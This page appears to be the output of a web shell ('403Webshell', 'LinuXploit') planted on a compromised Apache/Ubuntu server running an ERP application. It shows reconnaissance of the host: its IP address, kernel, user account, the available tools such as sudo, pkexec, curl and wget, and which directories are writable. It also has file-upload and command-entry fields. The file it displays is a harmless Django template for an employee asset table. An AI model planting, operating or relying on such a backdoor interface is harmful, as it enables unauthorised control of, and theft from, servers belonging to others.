403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/erp/employee/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/erp/employee/templates/asset-tab.html
{% load i18n %}
    <!-- Sticky Table  for own objective-->
    <div class="oh-sticky-table">
      <div class="oh-sticky-table__table ">
        <div class="oh-sticky-table__thead">
          <div class="oh-sticky-table__tr">
            <div class="oh-sticky-table__th">{% trans "Asset" %}</div>
            <div class="oh-sticky-table__th">{% trans "Status" %}</div>
            <div class="oh-sticky-table__th">{% trans "Assigned Date" %}</div>
            <div class="oh-sticky-table__th"></div>
          </div>
        </div>
        <div class="oh-sticky-table__tbody">
          <div id="assetRequestAllocationTarget"></div>
          {% for asset in assets %}
          {% if asset.asset_id.asset_status == "In use" %}
          <!-- asset request looping -->
            <div class="oh-sticky-table__tr">
                <div class="oh-sticky-table__sd">
                <div class="oh-profile oh-profile--md">
                    <div class="oh-profile__avatar mr-1">
                    <img src="https://ui-avatars.com/api/?name={{asset.asset_id.asset_name}}&background=random" class="oh-profile__image"
                        alt="" />
                    </div>
                    <span class="oh-profile__name oh-text--dark">{{asset.asset_id.asset_name}}
                    </span>
                </div>
                </div>
                <div class="oh-sticky-table__td">
                <span class="oh-dot oh-dot--small  me-1 oh-dot--color oh-dot--warning"></span>
                <span class="link-warning">
                {{asset.asset_id.asset_status}}
                </span>
                </div>
                <div class="oh-sticky-table__td">
                <span class="oh-dot oh-dot--small  me-1 oh-dot--color oh-dot--success"></span>
                <span class="link-success">
                {{asset.assigned_date}}
                </span>
                </div>
            </div>
          {% endif %}
          {% endfor %}
        </div>
      </div>
    </div>
    <!-- End of Sticky Table -->

Youez - 2016 - github.com/yon3zu
LinuXploit